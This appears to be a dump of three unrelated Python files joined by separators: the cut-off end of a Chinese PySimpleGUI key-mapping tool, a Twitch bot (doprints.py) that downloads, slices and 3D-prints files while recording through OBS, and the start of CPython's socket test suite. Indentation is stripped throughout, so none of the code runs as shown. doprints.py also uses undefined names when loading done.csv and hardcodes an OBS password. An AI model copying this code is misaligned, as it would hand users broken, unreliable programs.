Cmd = readConf(nowList) # 读取现在的配置文件(字典)
keys = Cmd.keys() # 获取现在的配置文件的字典的全部键值(列表)
setKeyValue.value = readList().index(nowList) # 传递现在的配置文件名称至共享变量
newConfValue.value = 1 # 向共享变量传递参数
i = 0
for i in keys: # 遍历现在的配置文件的字典的全部键值
sgCmd = Cmd[i] # 获取现在的配置的字典的第i个值
print("keys: " + i + " sgCmd: " + sgCmd)
window[i].Update(value=sgCmd) # 更新现在的配置的字典的第i个值的文本输入框内容为sgCmd
if event == '_saveConf':
uiKeys = ['K01', 'K02', 'K03', 'K04',
'K05', 'K06', 'K07', 'K08',
'K09', 'K10', 'K11', 'K12',
'EC1_Left', 'EC1_SW', 'EC1_Right',
'EC2_Left', 'EC2_SW', 'EC2_Right'] # GUI内全部自定义按键的ID
newConfValue.value = 1 # 向共享变量传递参数
i = 0
for i in uiKeys:
writeConf(i, value[i], value['_nowList']) # 更新选定配置文件的值到GUI
if event == '_delConf':
nowList = value['_nowList'] # 读GUI里的选配置下拉菜单的值
delList(nowList)
Comobo = readList() # 获取现在配置文件中的全部配置(列表)
window.Element("_nowList").Update(value='DEFAULT', values=Comobo) # 更新下拉菜单
if event == '_aboutConf':
sg.PopupAnnoying('配置说明\n1. 按下单个按键请输入单个按键名称\n2. 按下多个按键请以“+”为分隔符输入多个按键名称\n3. 鼠标滚轮对应键为,上:up,下:down,左:left,右:right\n4. 多功能键请输入全称,如Command,Alt,Ctrl', font=(FONT2))
if event == '_about':
sg.PopupAnnoying('作者碎碎念\n\n这算是我用Py写的第一个图形化软件,不得不说图形化真的很难写\n要去想要去设计要去注意的点太多了。\n在写这个程序的时候我经常写到一半就忘记了之前写过什么功能\n导致这个软件花了我一个晚上才糊出来(笑)。\n希望能够正常运行吧!\n', font=(FONT2))
if event is None:
tKey.terminate()
break
window.close()
if __name__ == '__main__':
# 初始化多进程
multiprocessing.freeze_support()
# 初始化共享变量
setKeyValue = Value("i", 0)
newConfValue = Value("i", 0)
tKey = Process(target=setKey, daemon=True, args=(setKeyValue, newConfValue, ))
# 启动映射及GUI
tKey.start()
gui()
|
doprints.py
|
from twitchio.ext import commands
import asyncio
import csv
import tempfile
import os
import sys
import subprocess
from obswebsocket import obsws, requests, events
import zipfile
from pathlib import Path
import threading
import signal
import time
import my_settings
global plz_stop
plz_stop = False
printing = "Loading..."
class Bot(commands.Bot):
def __init__(self):
# Initialise our Bot with our access token, prefix and a list of channels to join on boot...
super().__init__(token=my_settings.ACCESS_TOKEN, prefix='?', initial_channels=my_settings.CHANNEL)
async def event_ready(self):
# We are logged in and ready to chat and use commands...
print(f'Logged in as | {self.nick}')
@commands.command()
async def hello(self, ctx: commands.Context):
# Send a hello back!
await ctx.send(f'Hello {ctx.author.name}!')
@commands.command()
async def printing(self, ctx: commands.Context):
await ctx.reply(f'Currently printing {printing}')
async def update_printing(self, printing: str):
await self.connected_channels[0].send(f'Now printing {printing}')
async def update_status(self, status):
from datetime import datetime
from datetime import timedelta
last_update = datetime.now()
for l in status:
if datetime.now() - last_update > timedelta(minutes=5):
last_update = datetime.now()
await self.connected_channels[0].send(f'Print status {l}')
async def fetching(self, url: str, desc: str):
await self.connected_channels[0].send(f'Now fetch URL {url} for printing...')
await self.connected_channels[0].send(f'The description for this item is:')
c = 0
while (c == 0 or c < len(desc)-400 and c < 800):
await self.connected_channels[0].send(desc[c:c+400])
c += 400
bot = Bot()
bot_thread = threading.Thread(target=bot.run)
bot_thread.start()
# Register a signal handler for a gentle shutdown option
def handler(signum, frame):
global plz_stop
print('Signal handler called with signal', signum)
if plz_stop:
# Multiple ctrl-c exit now
sys.exit(1)
plz_stop = True
return True
# Set the signal handler
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
time.sleep(10)
count = 0
try:
with open("count") as countin:
count = int(next(countin))
except:
pass
global recording_file
recording_file = None
def on_event(message):
global recording_file
if not isinstance(message, events.StreamStatus):
print(u"Got message: {}".format(message))
try:
if message.getRecordingFilename():
recording_file = message.getRecordingFilename()
print(f"updated recording file name to {recording_file}")
except BaseException as err:
print(f"Error {err} updating")
pass
candidates = None
obs_client = obsws("localhost", 4444, "secret")
obs_client.connect()
obs_client.register(on_event)
endG = """M107 ; disable cooling fan
M106 P0 S0 ; disable cooling fan
M104 S0 ; shut down hot end
M140 S0 ; shut down bed
G92 E1 ; set filament position
G1 E-1 F300 ; retract filament
G28 X ; home X axis
G1 Y50 F1000 ; lift y axis
M84 ; disable stepper motors
"""
finished = {}
# Load already finished
try:
with open('done.csv') as donefile:
done_candidates = csv.DictReader(infile, fieldnames = fieldnames, quoting=csv.QUOTE_NONNUMERIC, escapechar='\\')
for candidate in done_candidates:
finished[candidate['file_url']] = 1
except:
pass
with open('candidates.csv', newline='') as infile:
candidates = csv.DictReader(infile, quoting=csv.QUOTE_NONNUMERIC, escapechar='\\')
# Write out the header if the done file doesn't exist yet.
try:
open('done.csv')
except:
with open('done.csv', "w") as donefile:
fieldnames = ['file_url', 'friendly_url', 'title', 'description', 'id', 'recording_file']
done_writer = csv.DictWriter(donefile, fieldnames = fieldnames, quoting=csv.QUOTE_NONNUMERIC, escapechar='\\')
done_writer.writeheader()
with open('done.csv', "a") as donefile:
count = count + 1
with open("count", "w") as countout:
countout.write(str(count))
fieldnames = ['file_url', 'friendly_url', 'title', 'description', 'recording_file']
done_writer = csv.DictWriter(donefile, fieldnames = fieldnames, quoting=csv.QUOTE_NONNUMERIC)
for candidate in candidates:
print(f"Handling candidate {candidate}")
if plz_stop:
break
if candidate["file_url"] in finished:
continue # Skip finished candidates
recording_file = None
obs_client.call(requests.StartRecording())
files_printed = 0
try:
with tempfile.TemporaryDirectory() as temp_dir:
# Skip any things we can't download it's probably transient.
try:
ext = candidate['file_url'].split(".")[-1]
path_to_file = f"{temp_dir}/a.{ext}"
asyncio.run(bot.fetching(candidate['file_url'], candidate['description']))
subprocess.run(["axel", candidate['file_url'], '-o', path_to_file])
if ext == "zip" or ext == "ZIP":
with zipfile.ZipFile(path_to_file, 'r') as zip_ref:
zip_ref.extractall(temp_dir)
except Exception as e:
print(f"Error {e} handling {candidate}")
continue
for path in Path(temp_dir).rglob('*'):
conv_process = subprocess.run(["python3", "conv.py", path])
returncode = conv_process.returncode
if returncode != 0:
print(f"Error converting {path}")
continue
stl = f"{path}.stl"
cmd = [
"kirimoto-slicer",
"--load=printer.json",
str(stl)
]
print(f"Running {cmd}")
slice_process = subprocess.run(cmd)
returncode = slice_process.returncode
if returncode != 0:
print(f"Error slicing {stl}")
continue
gcode = f"{path}.gcode"
printing = f"Printing {candidate['title']} file {gcode} from {candidate['friendly_url']}"
asyncio.run(bot.update_printing(printing))
print_proc = subprocess.Popen(["printcore", "-s", "/dev/ttyUSB0", gcode], stdout=subprocess.PIPE)
outs, errs = print_proc.communicate()
asyncio.run(bot.update_status(outs))
print_proc.poll()
returncode = print_proc.returncode
if (returncode == 0):
files_printed = files_printed + 1
except Exception as e:
print(f"Error {e} printing candidate {candidate}")
pass
finally:
pass
# Stop the recording
obs_client.call(requests.StopRecording())
# Wait for the recording_file to become present
while True:
import time
time.sleep(10)
print(f"Waiting for recording file to exist {recording_file}....")
if recording_file is not None:
print(f"Huzzah recorded as {recording_file}")
break
else:
print(f"No recording in {recording_file}")
done_writer.writerow({
"file_url": candidate['file_url'],
"friendly_url": candidate['friendly_url'],
"title": candidate['title'],
"description": candidate['description'],
"id": count,
"recording_file": recording_file})
donefile.flush()
sys.exit(0)
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import string
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
try:
import _thread as thread
import threading
except ImportError:
thread = None
threading = None
try:
import _socket
except ImportError:
_socket = None
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
if threading:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
self.clientSetUp()
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
sock.bind(path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
self.assertRaises(OSError, socket.gethostbyname, addr)
self.assertRaises(OSError, socket.gethostbyaddr, addr)
for addr in [support.HOST, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOST]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
